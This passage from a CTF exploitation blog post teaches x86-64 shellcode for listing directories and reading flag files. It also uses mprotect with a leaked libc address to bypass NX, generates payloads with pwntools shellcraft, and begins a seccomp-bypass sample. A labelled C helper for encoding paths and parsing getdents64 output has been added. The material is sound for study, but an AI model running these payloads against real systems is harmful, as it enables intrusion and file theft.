descriptor using <code class=\"language-text\">open</code>. 
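<p>As an added example (not code from the original post), the following C program covers the two data-handling steps around this open + getdents64 Shell Code. <code class=\"language-text\">encode_path</code> generalises the reversed-hex trick used in the scripts above, which only covers names of up to 8 bytes, to a path of any length, emitting the <code class=\"language-text\">mov rax, imm64</code> / <code class=\"language-text\">push rax</code> sequence that leaves a NUL-terminated path at RSP. <code class=\"language-text\">parse_dirent64</code> walks the records getdents64 returns instead of dumping them raw, stopping at a malformed record rather than trusting its length. The struct definition, the helper names and the sample buffer built by <code class=\"language-text\">add_entry</code> are assumptions of this example; only the record layout and the syscall number come from the kernel ABI.</p>

```c
/* Added example, not from the original post: encode_path() generalises the
 * post's reversed-hex trick to paths of any length, parse_dirent64() decodes
 * the records getdents64 returns, add_entry() builds a constructed sample
 * buffer. Struct and helper names are this example's own. Linux only. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

struct linux_dirent64 {            /* layout getdents64 writes; not in glibc headers */
    uint64_t d_ino;
    int64_t  d_off;
    uint16_t d_reclen;
    uint8_t  d_type;
    char     d_name[];
};
#define DIRENT_HDR offsetof(struct linux_dirent64, d_name)   /* 19 */

/* Little-endian value of up to 8 bytes of s from offset off, zero padded:
 * path_chunk("flag.txt", 0) == 0x7478742e67616c66, the post's mov rax immediate. */
uint64_t path_chunk(const char *s, size_t off) {
    uint64_t v = 0;
    for (size_t i = 0, n = strlen(s); i < 8 && off + i < n; i++)
        v |= (uint64_t)(unsigned char)s[off + i] << (8 * i);
    return v;
}

/* Bounded append into out; -1 if s plus its terminator would not fit. */
static int append(char *out, size_t outsz, size_t *len, const char *s) {
    size_t k = strlen(s);
    if (*len + k + 1 > outsz) return -1;
    memcpy(out + *len, s, k + 1);
    *len += k;
    return 0;
}

/* Emit NASM that leaves the NUL-terminated path at RSP. Chunks are pushed
 * last-first so the string reads forward in memory; `push 0` is only needed
 * when the length is a multiple of 8 and no chunk has room for the NUL.
 * Returns the number of push instructions, or -1 if out is too small. */
int encode_path(const char *path, char *out, size_t outsz) {
    size_t n = strlen(path), len = 0;
    char line[64];
    int pushes = 0;
    if (outsz == 0) return -1;
    out[0] = '\0';
    if (n % 8 == 0 && append(out, outsz, &len, "push 0\n")) return -1;
    pushes += (n % 8 == 0);
    for (size_t c = (n + 7) / 8; c-- > 0; pushes++) {
        snprintf(line, sizeof line, "mov rax, 0x%llx\npush rax\n",
                 (unsigned long long)path_chunk(path, c * 8));
        if (append(out, outsz, &len, line)) return -1;
    }
    return pushes;
}

/* Walk nbytes of getdents64 output, copying each d_name into names[].
 * A d_reclen that is too small or runs past the buffer ends the walk. */
int parse_dirent64(const char *buf, size_t nbytes, char names[][256], int max) {
    int count = 0;
    for (size_t pos = 0; pos + DIRENT_HDR < nbytes && count < max; ) {
        uint16_t reclen;
        memcpy(&reclen, buf + pos + 16, sizeof reclen);           /* unaligned-safe read */
        if (reclen <= DIRENT_HDR || pos + reclen > nbytes) break; /* malformed: stop */
        const char *name = buf + pos + DIRENT_HDR, *end = memchr(name, '\0', reclen - DIRENT_HDR);
        size_t namelen = end ? (size_t)(end - name) : reclen - DIRENT_HDR;
        if (namelen > 255) namelen = 255;
        memcpy(names[count], name, namelen);
        names[count++][namelen] = '\0';
        pos += reclen;
    }
    return count;
}

/* Append one record in kernel layout (d_reclen rounded up to 8) to a buffer
 * constructed by hand for testing; returns the new buffer length. */
size_t add_entry(char *buf, size_t len, uint64_t ino, uint8_t type, const char *name) {
    size_t namelen = strlen(name);
    uint16_t reclen = (uint16_t)((DIRENT_HDR + namelen + 1 + 7) & ~(size_t)7);
    int64_t off = (int64_t)(len + reclen);
    memset(buf + len, 0, reclen);
    memcpy(buf + len, &ino, 8); memcpy(buf + len + 8, &off, 8); memcpy(buf + len + 16, &reclen, 2);
    buf[len + 18] = (char)type;
    memcpy(buf + len + DIRENT_HDR, name, namelen);
    return len + reclen;
}

int main(void) {
    char text[512], buf[4096], names[64][256];
    if (encode_path("/tmp/", text, sizeof text) > 0) fputs(text, stdout);
    int fd = open(".", O_RDONLY);                            /* flags 0, as in the Shell Code */
    if (fd < 0) return 1;
    long n = syscall(SYS_getdents64, fd, buf, sizeof buf);   /* rax = 217 in the Shell Code */
    close(fd);
    int cnt = n < 0 ? 0 : parse_dirent64(buf, (size_t)n, names, 64);
    for (int i = 0; i < cnt; i++) puts(names[i]);
    return n < 0;
}
```

<p>Compiled with gcc on Linux and run from the challenge directory, it prints the push sequence for <code class=\"language-text\">/tmp/</code> and then the entries of the current directory one per line, which is the information you would otherwise have to pick out of the raw buffer dump.</p>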
The exact same code as the previous Shell Code can be used (just change the file path to a directory path).</p>\n<p>Then, issue <code class=\"language-text\">getdents64</code> with the obtained file descriptor as the argument; the results are returned in the specified buffer:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\"><span class=\"token comment\">; open dir</span>\nmov <span class=\"token register variable\">rax</span>, {dir_name}\npush <span class=\"token number\">0</span>\npush <span class=\"token register variable\">rax</span>\nmov <span class=\"token register variable\">rax</span>, <span class=\"token number\">2</span> <span class=\"token comment\">; open</span>\nmov <span class=\"token register variable\">rdi</span>, <span class=\"token register variable\">rsp</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token number\">0</span>\nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">0</span>\nsyscall\n\n<span class=\"token comment\">; getdents64</span>\nmov <span class=\"token register variable\">rdi</span>, <span class=\"token register variable\">rax</span>\nmov <span class=\"token register variable\">rax</span>, <span class=\"token number\">217</span> <span class=\"token comment\">; getdents64</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token register variable\">rsp</span>\nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">300</span>\nsyscall</code></pre></div>\n<p>Use the following code with this Shell Code:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">dir_name <span class=\"token operator\">=</span> <span class=\"token string\">\"0x\"</span> <span class=\"token operator\">+</span> <span class=\"token string\">\"/tmp/\"</span><span class=\"token 
punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token string\">\"utf-8\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"mov rax, </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>dir_name<span class=\"token punctuation\">}</span></span><span class=\"token string\">\npush 0\npush rax\nmov rax, 2\nmov rdi, rsp\nmov rsi, 0\nmov rdx, 0\nsyscall\n\nmov rdi, rax\nmov rax, 217\nmov rsi, rsp\nmov rdx, 300\nsyscall\n\nmov rax, 1\nmov rdi, 1\nmov rsi, rsp\nmov rdx, 300\nsyscall\n\"\"\"</span></span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> shellcode\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this successfully retrieves the names of files and directories under <code class=\"language-text\">/tmp</code>:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 915px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    
href=\"/static/8b78c6b7e6d4f582ad12f45f3bc93042/4255a/image-20240627012031364.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 42.083333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/8b78c6b7e6d4f582ad12f45f3bc93042/8ac56/image-20240627012031364.webp 240w,\n/static/8b78c6b7e6d4f582ad12f45f3bc93042/d3be9/image-20240627012031364.webp 480w,\n/static/8b78c6b7e6d4f582ad12f45f3bc93042/632b0/image-20240627012031364.webp 915w\"\n              sizes=\"(max-width: 915px) 100vw, 915px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/8b78c6b7e6d4f582ad12f45f3bc93042/8ff5a/image-20240627012031364.png 240w,\n/static/8b78c6b7e6d4f582ad12f45f3bc93042/e85cb/image-20240627012031364.png 480w,\n/static/8b78c6b7e6d4f582ad12f45f3bc93042/4255a/image-20240627012031364.png 915w\"\n            sizes=\"(max-width: 915px) 100vw, 915px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/8b78c6b7e6d4f582ad12f45f3bc93042/4255a/image-20240627012031364.png\"\n            alt=\"image-20240627012031364\"\n            title=\"image-20240627012031364\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"bypassing-nx-with-mprotect\" style=\"position:relative;\"><a href=\"#bypassing-nx-with-mprotect\" aria-label=\"bypassing nx with mprotect permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 
16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Bypassing NX with mprotect</h3>\n<p>So far I’ve been creating simple Shell Code, but when everything has to be done through ROP, a long chain quickly runs into constraints such as the gadgets available in the binary and limits on the input size.</p>\n<p>In such cases, rather than building a long ROP chain, jumping to Shell Code placed on the stack can be an effective workaround.</p>\n<p>However, when NX is enabled, as in this challenge binary, the stack is not executable, so a payload placed there cannot be run.</p>\n<p>One way around this is to call <code class=\"language-text\">mprotect</code> (here through its libc wrapper) to add execute permission to a region and place the Shell Code there. Two conditions apply: the start address must be page-aligned (a multiple of 0x1000 on x86-64), and if a seccomp filter is in place it must permit <code class=\"language-text\">mprotect</code>.</p>\n<p>Reference: <a href=\"https://sh0ebill.hatenablog.com/entry/2022/10/02/223537\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">SROPとNX enabledの回避 - ポン中のハシビロコウ</a></p>\n<p>For example, the following Shell Code uses <code class=\"language-text\">mprotect</code> to make a region of the given size starting at a given address readable, writable and executable (PROT_READ | PROT_WRITE | PROT_EXEC = 7):</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\">mov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">7</span> <span class=\"token comment\">; R|W|X</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token number\">0x1000</span> <span class=\"token comment\">; target memory size</span>\nmov <span class=\"token register variable\">rdi</span>, {target_addr}\nmov <span class=\"token register variable\">r15</span>, 
{mprotect_addr}\npush <span class=\"token register variable\">r15</span>\nret</code></pre></div>\n<p>For testing, use the following script:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\"># Exploit</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"System:\"</span><span class=\"token punctuation\">)</span>\nsystem_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"binsh:\"</span><span class=\"token punctuation\">)</span>\nbinsh_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token 
number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># system/mprotect offsets for the libc shipped with the challenge; recompute for another build</span>\nlibc_base <span class=\"token operator\">=</span> system_addr <span class=\"token operator\">-</span> <span class=\"token number\">0x50d70</span>\nmprotect_offset <span class=\"token operator\">=</span> <span class=\"token number\">0x11eaa0</span>\nmprotect_addr <span class=\"token operator\">=</span> libc_base <span class=\"token operator\">+</span> mprotect_offset\n\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"mov rdx, 7\nmov rsi, 0x1000\nmov rdi, </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span><span class=\"token number\">0x555555554000</span><span class=\"token punctuation\">}</span></span><span class=\"token string\">\nmov r15, </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>mprotect_addr<span class=\"token punctuation\">}</span></span><span class=\"token string\">\npush r15\nret\n\"\"\"</span></span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> shellcode\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this confirms that read, write and execute permissions are granted to the 0x1000-byte region starting at <code class=\"language-text\">0x555555554000</code> (the PIE base of the binary with ASLR disabled, e.g. under gdb; with ASLR on, the address would have to be leaked first):</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: 
auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/10b870c1f7efdef14750f7f904eee3d5/58fee/image-20240627221454126.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 99.58333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAADN0lEQVQ4y22U2ZaiQAyGuRqVTZAdBTdcEMVdEWy1e97/mf5JqhuPzszFd1JVVP2VUEmkLJ4hHYwxS1fwgy660UjgBRE0TUWn04HrunAcR8DjGp7btv2GVFxv+Ljdcf244XwucH984vH4wna3F2LD4QjH4xH7/R6n04n2nMW8KAqxtt1usdlsBOv1GlJVlnjc77jdPsTm+/1G4xsdOsCyLCRJgjzPSXgoxuPxWNjpdPqcj0YjAe+RqqoSQmwvl4uAbz8cvgX5wGKxQL/fR6/XQxzHwuq6jkajgWaz+YZUkod1CDV8AYfAIUdRJMR5H6/xXg4zCALIskz/WYOqqk+Eh7Vg7R3PmTrkNE2F8KuHpmkKwVpIURSBVF2vOJFHZxYsKWT2mH4+e8WvNpvNMKB/w+G8HmTPOOx67elheTzhuN3huNvhTCLMgV9uuYJNHvZ7ETb0KGsKlz1dLpfiErZZlonf8uqpVK03OC2WKFc5qtVa2HO2xCnNYFNY47CLfDZHMpmIV+RH4geqX9gwjHcPD3O6lTYn0wkmdHNC6TAYj0gggUW3B2FIid77TlzymC2v14nMYb8Jen4IxvG6cJ0AvhsicAO4wRBOdwDL9aArOjRVR0vTIdO/k/W2CFOWW0+x2kpty0REAokfITE9RDqVlGbDsHtoeSFUm1LHCuFaHhTXhurY0DyXHoUe5C8xIZhOc+jmDLKxgtZJEPdHGCRzaIYPRXUIE02iRShKTYdgAeXHvuRhcSmgujs0nAq6u0C+SrGnOjbNtgiJDwlPhBc18ouY8i64o8OyvcYvq4DuZFhlc6RUapy4Si2i/IvCArV9FZxnOQJvAMOcou30EfS7lG+UgzaFrJlQ/0vnTeRNMI7WiOIcfi9HaDpod0w0ZA1NgkOSiaasoKV8I8YyW5nsv0gLb4zU6yOlRjtwfEz9GBMvwtAJYVC4bttAbHbQNSgbiJgbBlta65EN6TvT/RlLH2WBL+qBn9cKFdX0F/XC39QfD9uNSOQx9bmSa51K8nI6P7lSI+E1LlkuVWZH5SndqFvfHw88Pj9RUudhy/OCDlhUCVOqHn4kbvfcsvwfeOz5PuHB875xiT+AwBmV3zlEtwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/10b870c1f7efdef14750f7f904eee3d5/8ac56/image-20240627221454126.webp 240w,\n/static/10b870c1f7efdef14750f7f904eee3d5/d3be9/image-20240627221454126.webp 
480w,\n/static/10b870c1f7efdef14750f7f904eee3d5/e46b2/image-20240627221454126.webp 960w,\n/static/10b870c1f7efdef14750f7f904eee3d5/42749/image-20240627221454126.webp 1051w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/10b870c1f7efdef14750f7f904eee3d5/8ff5a/image-20240627221454126.png 240w,\n/static/10b870c1f7efdef14750f7f904eee3d5/e85cb/image-20240627221454126.png 480w,\n/static/10b870c1f7efdef14750f7f904eee3d5/d9199/image-20240627221454126.png 960w,\n/static/10b870c1f7efdef14750f7f904eee3d5/58fee/image-20240627221454126.png 1051w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/10b870c1f7efdef14750f7f904eee3d5/d9199/image-20240627221454126.png\"\n            alt=\"image-20240627221454126\"\n            title=\"image-20240627221454126\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"generating-shell-code-with-shellcraft\" style=\"position:relative;\"><a href=\"#generating-shell-code-with-shellcraft\" aria-label=\"generating shell code with shellcraft permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Generating Shell Code with shellcraft</h3>\n<p>So far I’ve been handcrafting Shell 
Code, but pwntools’ <code class=\"language-text\">shellcraft</code> can generate equivalent Shell Code.</p>\n<p>For example, the following code easily generates Shell Code that uses <code class=\"language-text\">getdents64</code> for directory enumeration:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\nopen_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span><span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/tmp/\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\ngetdents64_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>getdents64<span class=\"token punctuation\">(</span><span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x1000</span><span class=\"token punctuation\">)</span>\nwrite_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x1000</span><span class=\"token punctuation\">)</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token 
string\">f'''\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>open_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>getdents64_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>write_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n'''</span></span><span class=\"token punctuation\">)</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 801px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6e6fb3bfef6eed8fd63f77ddf586301b/2ad15/image-20240628001443875.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 44.99999999999999%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6e6fb3bfef6eed8fd63f77ddf586301b/8ac56/image-20240628001443875.webp 240w,\n/static/6e6fb3bfef6eed8fd63f77ddf586301b/d3be9/image-20240628001443875.webp 480w,\n/static/6e6fb3bfef6eed8fd63f77ddf586301b/99a1d/image-20240628001443875.webp 801w\"\n              sizes=\"(max-width: 801px) 100vw, 801px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6e6fb3bfef6eed8fd63f77ddf586301b/8ff5a/image-20240628001443875.png 240w,\n/static/6e6fb3bfef6eed8fd63f77ddf586301b/e85cb/image-20240628001443875.png 
480w,\n/static/6e6fb3bfef6eed8fd63f77ddf586301b/2ad15/image-20240628001443875.png 801w\"\n            sizes=\"(max-width: 801px) 100vw, 801px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6e6fb3bfef6eed8fd63f77ddf586301b/2ad15/image-20240628001443875.png\"\n            alt=\"image-20240628001443875\"\n            title=\"image-20240628001443875\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Shell Code to read and output file contents can also be generated with the following script:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\nopen_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>openat<span class=\"token punctuation\">(</span><span class=\"token string\">\"/tmp/flag_in_tmp.txt\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\nread_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">20</span><span class=\"token punctuation\">)</span>\nwrite_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>write<span class=\"token 
punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">20</span><span class=\"token punctuation\">)</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f'''\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>open_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>read_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>write_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n'''</span></span><span class=\"token punctuation\">)</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 764px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/606b74449b17023c2d3cbc2271effde7/f3c12/image-20240628001908809.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 33.33333333333333%; position: relative; bottom: 0; left: 0; background-image: 
none; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/606b74449b17023c2d3cbc2271effde7/8ac56/image-20240628001908809.webp 240w,\n/static/606b74449b17023c2d3cbc2271effde7/d3be9/image-20240628001908809.webp 480w,\n/static/606b74449b17023c2d3cbc2271effde7/79237/image-20240628001908809.webp 764w\"\n              sizes=\"(max-width: 764px) 100vw, 764px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/606b74449b17023c2d3cbc2271effde7/8ff5a/image-20240628001908809.png 240w,\n/static/606b74449b17023c2d3cbc2271effde7/e85cb/image-20240628001908809.png 480w,\n/static/606b74449b17023c2d3cbc2271effde7/f3c12/image-20240628001908809.png 764w\"\n            sizes=\"(max-width: 764px) 100vw, 764px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/606b74449b17023c2d3cbc2271effde7/f3c12/image-20240628001908809.png\"\n            alt=\"image-20240628001908809\"\n            title=\"image-20240628001908809\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Both work the same way as handmade Shell Code, and payloads can be generated very easily.</p>\n<p>This feature is extremely convenient, but since our goal is not to 
be script kiddies, I’ll try not to over-rely on it.</p>\n<h3 id=\"other-shell-code-samples\" style=\"position:relative;\"><a href=\"#other-shell-code-samples\" aria-label=\"other shell code samples permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Other Shell Code Samples</h3>\n<ul>\n<li>Code that bypasses seccomp filters using <code class=\"language-text\">openat</code>, <code class=\"language-text\">mmap</code>, and <code class=\"language-text\">pwritev2</code> (in some cases <code class=\"language-text\">preadv2</code> can be used instead of <code class=\"language-text\">mmap</code>):</li>\n</ul>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">shellcode <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>pushstr<span class=\"token punctuation\">(</span><span class=\"token string\">\"/home/user/flag.txt\"</span><span class=\"token punctuation\">)</span>\nshellcode <span class=\"token operator\">+=</span> shellcraft<span class=\"token punctuation\">.</span>openat<span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token 